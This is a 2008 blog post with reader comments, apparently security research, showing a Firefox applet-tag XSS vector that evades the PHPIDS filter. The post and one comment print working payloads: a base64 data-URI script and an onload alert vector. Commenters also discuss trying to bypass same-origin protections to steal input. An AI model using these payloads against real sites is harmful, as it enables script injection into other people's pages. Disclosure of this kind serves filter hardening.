Firefox applet fun

Tuesday, 20 May 2008

I’ve been hacking the PHPIDS recently and I wanted a pure XSS vector not just script execution, I decided to experiment with the applet tag because it sneaks past the malicious tag detection. I thought to myself I wonder if it accepts the type attribute like the object tag does….

<applet src="data:text/html;base64,PHNjcmlwdD5hbGVydCgvWFNTLyk8L3N
jcmlwdD4" type=text/html>

That works it executes the base64 encoded string as HTML! It doesn’t stop there though :) 

<applet src="http://www.businessinfo.co.uk" type=text/html>

The applet tag even acts like a iframe :D

The entry 'Firefox applet fun' was posted on May 20th, 2008 at 9:02 am and last modified on August 27th, 2009 at 2:47 pm, and is filed under javascript, Security, xss. You can follow any responses to this entry through the RSS 2.0 feed. Both comments and pings are currently closed.

13 Responses to “Firefox applet fun”

  1. ehmo writes:
    No. 1 — May 20th, 2008 at 10:49 am

    hey man, nice find.

  2. Gareth Heyes writes:
    No. 2 — May 20th, 2008 at 11:17 am

    @ehmo

    Thx, it was fun to find :)

  3. Gareth Heyes writes:
    No. 3 — May 20th, 2008 at 12:07 pm

    Here’s a shortened XSS vector:-
    <applet/src/type=text/html onload=alert(1)

  4. daniel writes:
    No. 4 — May 20th, 2008 at 12:50 pm

    My only issue would be sites that use strict XHTML, this would be rendered useless, no?

  5. Gareth Heyes writes:
    No. 5 — May 20th, 2008 at 12:56 pm

    @daniel

    I ran a test in strict html and it still seemed to work

  6. daniel writes:
    No. 6 — May 20th, 2008 at 1:37 pm

    interesting, damn good find then sir!

  7. Alex writes:
    No. 7 — May 20th, 2008 at 2:47 pm

    Which version of Firefox did you use ? I tried it with Firefox 3 RC1 and it didn’t work.

  8. Gareth Heyes writes:
    No. 8 — May 20th, 2008 at 2:50 pm

    @Alex

    Not tried with beta but it works with latest FF2

  9. Alex writes:
    No. 9 — May 20th, 2008 at 6:50 pm

    I’ve tested it with the latest FF2. Now it works.
    It’s time to try accessing any property or value from outside that “iframe”. Maybe we can bypass the same origin policy and steal userinput from within this “iframe”.

  10. Gareth Heyes writes:
    No. 10 — May 20th, 2008 at 6:57 pm

    @Alex

    Yeah I thought that might be possible but it appears that the properties can’t be accessed using “this” and the frames array. However if you can prove me wrong then I’d be very interested on how to do it :)

  11. Alex writes:
    No. 11 — May 20th, 2008 at 10:16 pm

    I’ve tried some code to access data from within this “iframe”, but you’re right so far. ’til now I didn’t manage to get around the protection.

  12. .mario writes:
    No. 12 — May 21st, 2008 at 9:19 am

    Nice stuff Gareth – finally a “real” XSS again ;) Has been a pretty long time. The issues are fixed in the trunk – 0.4.8 as soon as I return from OWASP Europe.

  13. Gareth Heyes writes:
    No. 13 — May 21st, 2008 at 9:59 am

    @.mario

    Thx, I knew about the applet tag insert for a while but I didn’t think it was exploitable. It was good fun to find :D good luck with the conference

«
»